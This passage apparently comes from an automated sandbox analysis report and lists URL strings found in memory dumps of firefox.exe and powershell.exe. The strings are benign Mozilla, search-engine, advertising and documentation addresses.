Source: firefox.exe, 00000010.00000003.3049091889.000001A8B6D83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048859019.000001A8B6D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048647105.000001A8B6D50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048185549.000001A8B6D1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3047492392.000001A8B6B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000010.00000003.3242315863.000001A8B9F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000010.00000003.3257505596.000001A8B8D82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3270251672.000001A8B8D8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CA4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgbrowser.urlbar.suggest.topsitesremoveTabsProgressListenercreateContentPrin
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads-us.rd.linksynergy.com/as.php
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: powershell.exe, 00000007.00000002.3030468982.0000000004A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: firefox.exe, 00000010.00000003.3099063952.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235315331.000001A8C389B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.comrward-
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://app.adjust.com/a8bxj8j?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B749E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3307005394.000001A8B2781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000010.00000003.3238343935.000001A8C3792000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3263073996.000001A8C3846000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5F6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.comorward-
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000010.00000003.3257903707.000001A8B8D6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3328304158.000001A8B6B21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Error
Source: firefox.exe, 00000010.00000003.3214705586.000001A8C0269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000010.00000003.3264652075.000001A8C3148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000010.00000003.3225852250.000001A8B8034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: firefox.exe, 00000010.00000003.3212468668.000001A8C02E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7B2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7B1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000010.00000003.3264434250.000001A8C317B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3330787150.000001A8B6F9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B27C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D563C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3291725111.000001F42D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000010.00000003.3264232330.000001A8C333F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000010.00000003.3246944068.000001A8B91AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000010.00000003.3236109486.000001A8C33BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000010.00000003.3093590336.000001A8C3238000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3323580066.000001A8B6503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3315084846.000001A8B3E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6164000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsFea
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000010.00000003.3125375221.000001A8B7F39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000010.00000003.3093590336.000001A8C3238000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3178058975.000001A8C3235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000010.00000002.3297704058.0000010530930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000010.00000002.3343255794.000001A8B7E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3049091889.000001A8B6D83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048859019.000001A8B6D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3124581300.000001A8B80E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048647105.000001A8B6D50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262099436.000001A8B89AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3186917673.000001A8B80D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048185549.000001A8B6D1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3047492392.000001A8B6B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sget
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
